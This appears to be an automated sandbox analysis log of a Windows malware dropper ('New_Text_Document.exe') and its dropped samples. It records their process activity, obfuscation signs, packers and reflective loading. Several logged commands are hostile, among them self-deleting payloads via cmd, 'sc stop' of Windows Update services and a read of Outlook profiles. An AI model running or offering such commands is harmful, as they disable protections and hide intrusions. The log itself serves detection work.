                    Source: C:\Windows\SysWOW64\colorcpl.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user~1\AppData\Local\Temp\pznhcda.exe"
                    Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                    Source: C:\Windows\SysWOW64\raserver.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\a\sbinzx.exe"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop UsoSvc
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop wuauserv
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop bits
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop dosvc
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
                    Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                    Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                    Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                    Source: C:\Users\user\Desktop\a\audiodgse.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                    Source: C:\Users\user\Desktop\a\autolog.exeFile created: C:\Users\user~1\AppData\Local\Temp\nsa467A.tmp
                    Source: New_Text_Document.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                    Source: C:\Users\user\Desktop\New_Text_Document.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\b8493bec853ac702d2188091d76ccffa\mscorlib.ni.dllJump to behavior
                    Source: C:\Users\user\Desktop\a\audiodgse.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a403a0b75e95c07da2caa7f780446a62\mscorlib.ni.dllJump to behavior
                    Source: C:\Users\user\Desktop\a\sbinzx.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a403a0b75e95c07da2caa7f780446a62\mscorlib.ni.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\b8493bec853ac702d2188091d76ccffa\mscorlib.ni.dll
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7188:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7760:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6772:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7540:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7988:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7468:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7920:120:WilError_03
                    Source: 3.2.audiodgse.exe.25c2bd4.3.raw.unpack, Ft.csCryptographic APIs: 'CreateDecryptor'
                    Source: 3.2.audiodgse.exe.23a0000.0.raw.unpack, Ft.csCryptographic APIs: 'CreateDecryptor'
                    Source: C:\Users\user\Desktop\a\setup.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Users\user\Desktop\New_Text_Document.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                    Source: C:\Windows\SysWOW64\raserver.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
                    Source: New_Text_Document.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: New_Text_Document.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: firefox.pdbP source: raserver.exe, 00000014.00000003.1558158883.0000000007CCE000.00000004.00000020.00020000.00000000.sdmp, raserver.exe, 00000014.00000003.1609490585.0000000008361000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: wextract.pdb source: New_Text_Document.exe, 00000000.00000002.2491308945.000000000347B000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: poqexec.pdb source: LkeNkIcFYvnikmw.exe, 0000000E.00000003.1295682318.0000000000CEB000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: poqexec.pdbGCTL source: LkeNkIcFYvnikmw.exe, 0000000E.00000003.1295682318.0000000000CEB000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: colorcpl.pdbGCTL source: pznhcda.exe, 00000010.00000002.1370743174.0000000000578000.00000004.00000020.00020000.00000000.sdmp, pznhcda.exe, 00000010.00000002.1381201371.0000000002660000.00000040.10000000.00040000.00000000.sdmp
                    Source: Binary string: wextract.pdbGCTL source: New_Text_Document.exe, 00000000.00000002.2491308945.000000000347B000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: LyoY.pdb source: New_Text_Document.exe, 00000000.00000002.2491308945.000000000347B000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: colorcpl.pdb source: pznhcda.exe, 00000010.00000002.1370743174.0000000000578000.00000004.00000020.00020000.00000000.sdmp, pznhcda.exe, 00000010.00000002.1381201371.0000000002660000.00000040.10000000.00040000.00000000.sdmp
                    Source: Binary string: LyoY.pdbSHA2565 source: New_Text_Document.exe, 00000000.00000002.2491308945.000000000347B000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: LkeNkIcFYvnikmw.exe, 0000000E.00000002.2472980691.00000000004BE000.00000002.00000001.01000000.0000000F.sdmp
                    Source: Binary string: c:\miniprojects\x86il\il86\x64\release\IL86.pdb! source: setup.exe, 00000013.00000002.1460018567.00007FF7F174E000.00000040.00000001.01000000.00000012.sdmp
                    Source: Binary string: wntdll.pdbUGP source: audiodgse.exe, 00000008.00000002.1372343268.0000000001230000.00000040.00001000.00020000.00000000.sdmp, pznhcda.exe, 0000000F.00000003.1294737365.0000000002180000.00000004.00001000.00020000.00000000.sdmp, pznhcda.exe, 0000000F.00000003.1287410066.000000001D0B0000.00000004.00001000.00020000.00000000.sdmp, pznhcda.exe, 00000010.00000002.1373706640.0000000000B7E000.00000040.00001000.00020000.00000000.sdmp, pznhcda.exe, 00000010.00000003.1296909656.000000000067F000.00000004.00000020.00020000.00000000.sdmp, pznhcda.exe, 00000010.00000002.1373706640.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, pznhcda.exe, 00000010.00000003.1299034162.000000000082C000.00000004.00000020.00020000.00000000.sdmp, raserver.exe, 00000014.00000003.1361757763.0000000004BD5000.00000004.00000020.00020000.00000000.sdmp, raserver.exe, 00000014.00000002.2492079854.0000000004F30000.00000040.00001000.00020000.00000000.sdmp, raserver.exe, 00000014.00000002.2492079854.00000000050CE000.00000040.00001000.00020000.00000000.sdmp, raserver.exe, 00000014.00000003.1372810820.0000000004D81000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000017.00000002.2488003527.0000000004780000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 00000017.00000003.1348193628.00000000043AD000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: wntdll.pdb source: audiodgse.exe, audiodgse.exe, 00000008.00000002.1372343268.0000000001230000.00000040.00001000.00020000.00000000.sdmp, pznhcda.exe, 0000000F.00000003.1294737365.0000000002180000.00000004.00001000.00020000.00000000.sdmp, pznhcda.exe, 0000000F.00000003.1287410066.000000001D0B0000.00000004.00001000.00020000.00000000.sdmp, pznhcda.exe, 00000010.00000002.1373706640.0000000000B7E000.00000040.00001000.00020000.00000000.sdmp, pznhcda.exe, 00000010.00000003.1296909656.000000000067F000.00000004.00000020.00020000.00000000.sdmp, pznhcda.exe, 00000010.00000002.1373706640.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, pznhcda.exe, 00000010.00000003.1299034162.000000000082C000.00000004.00000020.00020000.00000000.sdmp, raserver.exe, 00000014.00000003.1361757763.0000000004BD5000.00000004.00000020.00020000.00000000.sdmp, raserver.exe, 00000014.00000002.2492079854.0000000004F30000.00000040.00001000.00020000.00000000.sdmp, raserver.exe, 00000014.00000002.2492079854.00000000050CE000.00000040.00001000.00020000.00000000.sdmp, raserver.exe, 00000014.00000003.1372810820.0000000004D81000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000017.00000002.2488003527.0000000004780000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 00000017.00000003.1348193628.00000000043AD000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: RAServer.pdb source: audiodgse.exe, 00000008.00000002.1370169341.0000000000DD7000.00000004.00000020.00020000.00000000.sdmp, sbinzx.exe, 00000009.00000002.1375353577.0000000001AB0000.00000040.10000000.00040000.00000000.sdmp, sbinzx.exe, 00000009.00000002.1374176668.00000000015C7000.00000004.00000020.00020000.00000000.sdmp, LkeNkIcFYvnikmw.exe, 0000000E.00000003.1296076993.0000000000CEB000.00000004.00000020.00020000.00000000.sdmp, LkeNkIcFYvnikmw.exe, 0000000E.00000002.2484721379.0000000000D04000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: c:\miniprojects\x86il\il86\x64\release\IL86.pdb source: setup.exe, 00000013.00000002.1460018567.00007FF7F174E000.00000040.00000001.01000000.00000012.sdmp
                    Source: Binary string: RAServer.pdbGCTL source: audiodgse.exe, 00000008.00000002.1370169341.0000000000DD7000.00000004.00000020.00020000.00000000.sdmp, sbinzx.exe, 00000009.00000002.1375353577.0000000001AB0000.00000040.10000000.00040000.00000000.sdmp, sbinzx.exe, 00000009.00000002.1374176668.00000000015C7000.00000004.00000020.00020000.00000000.sdmp, LkeNkIcFYvnikmw.exe, 0000000E.00000003.1296076993.0000000000CEB000.00000004.00000020.00020000.00000000.sdmp, LkeNkIcFYvnikmw.exe, 0000000E.00000002.2484721379.0000000000D04000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: firefox.pdb source: raserver.exe, 00000014.00000003.1558158883.0000000007CCE000.00000004.00000020.00020000.00000000.sdmp, raserver.exe, 00000014.00000003.1609490585.0000000008361000.00000004.00000020.00020000.00000000.sdmp

                    Data Obfuscation

                    barindex
                    Source: C:\Users\user\AppData\Local\Temp\pznhcda.exeUnpacked PE file: 16.2.pznhcda.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;
                    Source: Yara matchFile source: 0.2.New_Text_Document.exe.347db3e.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.2491308945.0000000003621000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: New_Text_Document.exe PID: 7076, type: MEMORYSTR
                    Source: Yara matchFile source: C:\Users\user\Desktop\a\kung.exe, type: DROPPED
                    Source: audiodgse.exe.0.dr, Form1.cs.Net Code: InitializeComponent System.AppDomain.Load(byte[])
                    Source: audiodgse.exe.0.dr, Form1.cs.Net Code: InitializeComponent contains xor as well as GetObject
                    Source: sbinzx.exe.0.dr, MainForm.cs.Net Code: InitializeComponent contains xor as well as GetObject
                    Source: davincizx.exe.0.dr, MainForm.cs.Net Code: InitializeComponent contains xor as well as GetObject
                    Source: 3.2.audiodgse.exe.6dc0000.8.raw.unpack, CKXHsr7fVo6pg31t6V.cs.Net Code: bq7PksL6pJ System.Reflection.Assembly.Load(byte[])
                    Source: 3.2.audiodgse.exe.3799c10.4.raw.unpack, CKXHsr7fVo6pg31t6V.cs.Net Code: bq7PksL6pJ System.Reflection.Assembly.Load(byte[])
                    Source: 3.2.audiodgse.exe.3519970.5.raw.unpack, -Module-.cs.Net Code: _202E_202A_200D_200D_200E_202C_206D_202D_200C_200C_206E_206D_206E_202D_200E_206E_200F_200F_202E_202C_200E_206C_206F_202D_200F_200B_202A_202E_200D_206A_200E_202E_202C_200C_200E_200B_206B_202B_206A_202D_202E System.Reflection.Assembly.Load(byte[])
                    Source: 3.2.audiodgse.exe.3519970.5.raw.unpack, bU.cs.Net Code: A8
                    Source: 3.2.audiodgse.exe.3519970.5.raw.unpack, bU.cs.Net Code: _202E_206F_202C_200E_200F_202C_202B_206A_202B_200D_200B_206B_202E_200E_202E_200B_206F_202A_206F_202B_206D_200C_202B_206F_202B_202B_202E_206A_206D_202C_206A_206A_206D_200B_202A_202A_200E_200F_200B_200C_202E System.AppDomain.Load(byte[])
                    Source: 3.2.audiodgse.exe.25c2bd4.3.raw.unpack, Ft.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                    Source: 3.2.audiodgse.exe.23a0000.0.raw.unpack, Ft.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                    Source: C:\Users\user\Desktop\New_Text_Document.exeCode function: 0_2_00007FFAACCC00BD pushad ; iretd 0_2_00007FFAACCC00C1
                    Source: C:\Users\user\Desktop\a\sbinzx.exeCode function: 5_2_0270CE94 push ss; retf 5_2_0270CEA5
                    Source: C:\Users\user\Desktop\a\sbinzx.exeCode function: 5_2_06DDBDB5 push FFFFFF8Bh; iretd 5_2_06DDBDB7
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_00423063 push esp; iretd 8_2_00423075
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_00412089 push ebx; ret 8_2_0041208A
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_004179AA pushfd ; retf 8_2_004179AB
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_00412AC9 push eax; ret 8_2_00412AA7
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_00412AE3 push 77EA4DE2h; ret 8_2_00412AE8
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_00403280 push eax; ret 8_2_00403282
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_00412A91 push eax; ret 8_2_00412AA7
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0041B2A1 push edi; ret 8_2_0041B2A2
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_00412B6E push ds; iretd 8_2_00412B6F
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0042B532 push eax; ret 8_2_0042B534
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0040CD80 push ecx; ret 8_2_0040CD82
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_004105B8 pushfd ; retf 8_2_004105B9
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_00410662 push BD1374B0h; retf 8_2_00410667
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_00401E7C push ebx; retf 8_2_00401E7D
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_00404E8E push esp; ret 8_2_00404EA1
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_00401EBA push eax; iretd 8_2_00401ECC
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0040CF00 push F954A730h; ret 8_2_0040CF15
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_00405705 push cs; iretd 8_2_0040570B
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0041AFE9 push ss; iretd 8_2_0041AFEA
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_004017A1 pushfd ; ret 8_2_004017A2
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0123225F pushad ; ret 8_2_012327F9
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012327FA pushad ; ret 8_2_012327F9
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012609AD push ecx; mov dword ptr [esp], ecx8_2_012609B6
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0123283D push eax; iretd 8_2_01232858
                    Source: C:\Users\user\Desktop\a\sbinzx.exeCode function: 9_2_0041E006 push dword ptr [DF23F5C2h]; ret 9_2_0041DE68
                    Source: C:\Users\user\Desktop\a\sbinzx.exeCode function: 9_2_00417953 push ebp; retf 9_2_004179C2
                    Source: C:\Users\user\Desktop\a\sbinzx.exeCode function: 9_2_004179E5 push cs; iretd 9_2_004179E6
                    Source: C:\Users\user\Desktop\a\sbinzx.exeCode function: 9_2_004169F1 push esi; ret 9_2_00416A10
                    Source: smss.exe.0.drStatic PE information: 0xC947732C [Sun Jan 3 12:35:56 2077 UTC]
                    Source: kung.exe.0.drStatic PE information: section name: .x
                    Source: setup.exe.0.drStatic PE information: section name:
                    Source: setup.exe.0.drStatic PE information: section name:
                    Source: setup.exe.0.drStatic PE information: section name:
                    Source: setup.exe.0.drStatic PE information: section name:
                    Source: setup.exe.0.drStatic PE information: section name:
                    Source: setup.exe.0.drStatic PE information: section name:
                    Source: setup.exe.0.drStatic PE information: section name:
                    Source: setup.exe.0.drStatic PE information: section name:
                    Source: setup.exe.0.drStatic PE information: section name:
                    Source: setup.exe.0.drStatic PE information: section name:
                    Source: setup.exe.0.drStatic PE information: section name:
                    Source: setup.exe.0.drStatic PE information: section name: .imports
                    Source: setup.exe.0.drStatic PE information: section name: .themida
                    Source: setup.exe.0.drStatic PE information: section name: .boot
                    Source: tus.exe.0.drStatic PE information: section name: .00cfg
                    Source: 201.exe.0.drStatic PE information: section name:
                    Source: 201.exe.0.drStatic PE information: section name:
                    Source: 201.exe.0.drStatic PE information: section name:
                    Source: 201.exe.0.drStatic PE information: section name: .themida
                    Source: 201.exe.0.drStatic PE information: section name: .boot
                    Source: initial sampleStatic PE information: section where entry point is pointing to: .boot
                    Source: initial sampleStatic PE information: section name: entropy: 7.970947843197417
                    Source: initial sampleStatic PE information: section name: .text entropy: 7.957838786109187
                    Source: initial sampleStatic PE information: section name: .text entropy: 7.915189773853943
                    Source: initial sampleStatic PE information: section name: .text entropy: 7.894685666841932
                    Source: initial sampleStatic PE information: section name: .boot entropy: 7.8942585197242625
                    Source: 3.2.audiodgse.exe.25c2bd4.3.raw.unpack, Ft.csHigh entropy of concatenated method names: 'lZA', 'RgtTUJcyZL', 'dZ3', 'MZx', 'NZe', 'EZk', 'XNe8QK', 'mP', 'aY', 'ys'
                    Source: 3.2.audiodgse.exe.6dc0000.8.raw.unpack, MfVvEuP4iH5w7ivbo5.csHigh entropy of concatenated method names: 'dFbCXKqAwt', 'vwHC1Fsjnv', 'x3hCiblvEg', 'wHMCJSHRJb', 'LlqCuX227j', 'AKSCshotF5', 'YTACLAU38q', 'cNwCAJih3d', 'wWfC0COV8o', 'DEdCOMZrLe'
                    Source: 3.2.audiodgse.exe.6dc0000.8.raw.unpack, Hsn2v65veCUa9POwXb.csHigh entropy of concatenated method names: 'JqQqwY5X48', 'a3gqWnb19e', 'ymFqkYrYH8', 'sv3qrmvHwD', 'QlLqDVau2M', 'GlpqGMO5X3', 's7Kq1gmDXr', 'a65q4xFbEp', 'ckfF3WtyTWJXCOAhumb', 'BdotlZt3Bqm2PPPWQ78'
                    Source: 3.2.audiodgse.exe.6dc0000.8.raw.unpack, QU7UqdtGwCSDkMjeM9.csHigh entropy of concatenated method names: 'AE9Vep6n2D', 'yYBVbpfFsQ', 'x7xV6vTGT6', 'RBmV3yGK1W', 'MZpVl5gj90', 'gtfVEc7vT4', 'HvrVt3T8Tp', 'zhfVxBbag4', 'FtEVTaeaNy', 'XcdVIQs2XX'
                    Source: 3.2.audiodgse.exe.6dc0000.8.raw.unpack, puC7S9fLgW5pVixRji.csHigh entropy of concatenated method names: 'Dispose', 'WFSRT26EG3', 'jEXFJ9uh4I', 'hrO55yhBDn', 'vAQRISPl6U', 'xxDRzCCwAn', 'ProcessDialogKey', 'X1uFU5WxqW', 'FMcFRHSg76', 'PGWFFKZcoK'
                    Source: 3.2.audiodgse.exe.6dc0000.8.raw.unpack, Se0S3oehtH4AavQoSi2.csHigh entropy of concatenated method names: 'aC1dWIZtWh', 'S0CdyD91C3', 'ahldkA5RBt', 'VxDdrpboTO', 'hysdp7UCt1', 'IX6dDrLZ7u', 'tM5dG6iNHd', 'rkCdX8Xrvr', 'LGfd1f0i5H', 'fJXd4Rbd43'
                    Source: 3.2.audiodgse.exe.6dc0000.8.raw.unpack, eHVVA4EWwkwJFyCMe0.csHigh entropy of concatenated method names: 'bZgYxWIUgT', 'TCYYIMbRKd', 'fUb8UKLVuO', 'f748RRKHRZ', 'cM0YOBdSne', 'jwZYQDPfXr', 'UKLY23EiDh', 'XAxYehWXmh', 'KASYb2Sp20', 'gBMY6EWVMs'
                    Source: 3.2.audiodgse.exe.6dc0000.8.raw.unpack, hrS1OKzdA0DbnXjthy.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'D6pdCRew8p', 'YTKdS0nA3k', 'Fy4dhK7Xp6', 'hGxdYQdk1m', 'AKSd8Ko9gf', 'R6QddvA01o', 'w8Rdoxsn9K'
                    Source: 3.2.audiodgse.exe.6dc0000.8.raw.unpack, BU4hSv4Na1c48ACXsU.csHigh entropy of concatenated method names: 'cZT7rqoele', 'YST7DAJWpE', 'Uuf7X9itQT', 'nW371jXUGW', 'kqS7Sxf2dO', 'l177hfYZeT', 'sTd7YBBdkB', 'apc78Ls49P', 'Qqc7dohgto', 'Pkb7oqKP37'
                    Source: 3.2.audiodgse.exe.6dc0000.8.raw.unpack, FxEVFXkKaPOnpESCK3.csHigh entropy of concatenated method names: 'NmlYmeXeau', 'xs5YgrYqvD', 'ToString', 'r62Ynh6Vha', 'KV0YVpuQ6c', 'hhNY72GEsf', 'ICmYcxCrI4', 'BWyYqpGpNA', 'j5AYfnapZF', 'feiYHEgG30'
                    Source: 3.2.audiodgse.exe.6dc0000.8.raw.unpack, BdT4PgWkWIhghle95B.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'tdEFTPKAQJ', 'WmoFI2kMqU', 'Q0CFzRKb43', 'eGyaUec38m', 'zZgaRhZH1A', 'QCYaFs8tsG', 'VE3aaH1Adu', 'gSyUVGhDcWtBMZH3VYi'
                    Source: 3.2.audiodgse.exe.6dc0000.8.raw.unpack, ksgyXk8IESKtxbdnht.csHigh entropy of concatenated method names: 'dRm8nkIj12', 'zlf8VkFZTh', 'NVU87qGU2t', 'KEt8c2kFhW', 'J0l8q1yNlC', 'dxQ8ffyXie', 'oWw8HW14h8', 'REF8NSXBmK', 'VCm8m1K3c6', 'joK8gRyn0k'
                    Source: 3.2.audiodgse.exe.6dc0000.8.raw.unpack, CKXHsr7fVo6pg31t6V.csHigh entropy of concatenated method names: 'T1KavjXnOL', 'Rl6anoZSAX', 'tZYaVyme3b', 'ypYa7vQoWd', 'vIQacJB1BH', 'YCBaqMB7VH', 'lR7af4dwfv', 'oLyaHFjOLZ', 'aVwaNs568p', 'Q6Wam2suEq'
                    Source: 3.2.audiodgse.exe.6dc0000.8.raw.unpack, vulbWcXB7FYT60l5PR.csHigh entropy of concatenated method names: 'NPl8i4LPRO', 'Yoy8JSkIZx', 'er6896nTih', 'XSG8uXl9F7', 'm2H8eZYg3y', 'qZe8sAkrOM', 'Next', 'Next', 'Next', 'NextBytes'
                    Source: 3.2.audiodgse.exe.6dc0000.8.raw.unpack, yTifNaqMykSESGEUH6.csHigh entropy of concatenated method names: 'i8idRJwfDf', 'BxydaSyctj', 'gYFdPioyvp', 'ujjdn0jy2s', 'P9rdVEg1jf', 'gQidcX5lyB', 'D8ldqgQihc', 't148t8UKtv', 'TAA8x2hcDw', 'nhV8THwL4O'
                    Source: 3.2.audiodgse.exe.6dc0000.8.raw.unpack, Jq1UGkJ2VZDwyESrPA.csHigh entropy of concatenated method names: 'B8eqv3or3b', 'q7DqV7IvAl', 'T3kqcivprj', 'uwXqfMSZQx', 'Kt5qHAjZZj', 'zkfclrhAWW', 'nQgcEgeHbx', 'PUYctmZcx5', 'hMAcxy4YmW', 'igOcTYJ2w9'
                    Source: 3.2.audiodgse.exe.6dc0000.8.raw.unpack, wJZBj0yLp8m4hHGtBk.csHigh entropy of concatenated method names: 'hc3fWbBITo', 'NiHfyOo1FW', 'CZDfkeV4UX', 'nndfrGMO2N', 'ELjfpKZLap', 'OPnfDjtoog', 'smMfG9jnpy', 'KelfX5t8wU', 'jMbf121dgN', 'sAwf4YSBTL'
                    Source: 3.2.audiodgse.exe.6dc0000.8.raw.unpack, O8jqyfe0oZtjZOr0Upx.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'PU4oe5uIYC', 'TJQobfn6Lj', 'K6jo6VRrZl', 'vdgo38pplL', 'urbol0IBby', 'm6KoEFvlFK', 'gHOotmwtdT'
                    Source: 3.2.audiodgse.exe.6dc0000.8.raw.unpack, zqtaHhxEZc3pdQNfIL.csHigh entropy of concatenated method names: 'eXXkOMMOM', 'AovriP4vn', 'KpUDPmUny', 'IiEGqxvND', 'tRu1sdqmp', 'oey4rcOZo', 'SmmP8gfBny9AciTbBD', 'XkxLYxpW54jUVgcx39', 'sti8HoMrD', 'HqOoxg1si'
                    Source: 3.2.audiodgse.exe.6dc0000.8.raw.unpack, juhWCevcuygL56DppD.csHigh entropy of concatenated method names: 'wbvRf3MtNt', 'FUTRHaCkgY', 'FG6RmF1JXD', 'KndRgIXYmb', 'iWyRS4uGXb', 'uVfRhZUsiQ', 'LyyiaElm51ATcmA0Tt', 'TqUfxYGu5c3g5JKmld', 'bhIRRuss1r', 'Yy9RaNCJhQ'
                    Source: 3.2.audiodgse.exe.6dc0000.8.raw.unpack, lEBSbmeeyBZf7LIer7J.csHigh entropy of concatenated method names: 'ToString', 'u7ToaVdM0n', 'L8EoPBr0WQ', 'eObovtoytu', 'VqXon0rGv5', 'M3goVCjeWx', 'kYwo7Qu2YW', 'Vvsoca8MPE', 'YkKHptnZUiyIyDYXmxC', 'jT7NPxnXK4o6yxBeKNy'
                    Source: 3.2.audiodgse.exe.6dc0000.8.raw.unpack, rnNYqZNnZdJp5kZbQg.csHigh entropy of concatenated method names: 'fhecpyGYEo', 'RowcGxMWuN', 'arQ79G6tjH', 'GpU7udJss0', 'JZN7srNwCQ', 'VC77ZYHh2S', 'zFv7LioGcm', 'O6G7A8XscM', 'JWk7K8AvRx', 'Km770FUZv2'
                    Source: 3.2.audiodgse.exe.3799c10.4.raw.unpack, MfVvEuP4iH5w7ivbo5.csHigh entropy of concatenated method names: 'dFbCXKqAwt', 'vwHC1Fsjnv', 'x3hCiblvEg', 'wHMCJSHRJb', 'LlqCuX227j', 'AKSCshotF5', 'YTACLAU38q', 'cNwCAJih3d', 'wWfC0COV8o', 'DEdCOMZrLe'
                    Source: 3.2.audiodgse.exe.3799c10.4.raw.unpack, Hsn2v65veCUa9POwXb.csHigh entropy of concatenated method names: 'JqQqwY5X48', 'a3gqWnb19e', 'ymFqkYrYH8', 'sv3qrmvHwD', 'QlLqDVau2M', 'GlpqGMO5X3', 's7Kq1gmDXr', 'a65q4xFbEp', 'ckfF3WtyTWJXCOAhumb', 'BdotlZt3Bqm2PPPWQ78'
                    Source: 3.2.audiodgse.exe.3799c10.4.raw.unpack, QU7UqdtGwCSDkMjeM9.csHigh entropy of concatenated method names: 'AE9Vep6n2D', 'yYBVbpfFsQ', 'x7xV6vTGT6', 'RBmV3yGK1W', 'MZpVl5gj90', 'gtfVEc7vT4', 'HvrVt3T8Tp', 'zhfVxBbag4', 'FtEVTaeaNy', 'XcdVIQs2XX'
                    Source: 3.2.audiodgse.exe.3799c10.4.raw.unpack, puC7S9fLgW5pVixRji.csHigh entropy of concatenated method names: 'Dispose', 'WFSRT26EG3', 'jEXFJ9uh4I', 'hrO55yhBDn', 'vAQRISPl6U', 'xxDRzCCwAn', 'ProcessDialogKey', 'X1uFU5WxqW', 'FMcFRHSg76', 'PGWFFKZcoK'
                    Source: 3.2.audiodgse.exe.3799c10.4.raw.unpack, Se0S3oehtH4AavQoSi2.csHigh entropy of concatenated method names: 'aC1dWIZtWh', 'S0CdyD91C3', 'ahldkA5RBt', 'VxDdrpboTO', 'hysdp7UCt1', 'IX6dDrLZ7u', 'tM5dG6iNHd', 'rkCdX8Xrvr', 'LGfd1f0i5H', 'fJXd4Rbd43'
                    Source: 3.2.audiodgse.exe.3799c10.4.raw.unpack, eHVVA4EWwkwJFyCMe0.csHigh entropy of concatenated method names: 'bZgYxWIUgT', 'TCYYIMbRKd', 'fUb8UKLVuO', 'f748RRKHRZ', 'cM0YOBdSne', 'jwZYQDPfXr', 'UKLY23EiDh', 'XAxYehWXmh', 'KASYb2Sp20', 'gBMY6EWVMs'
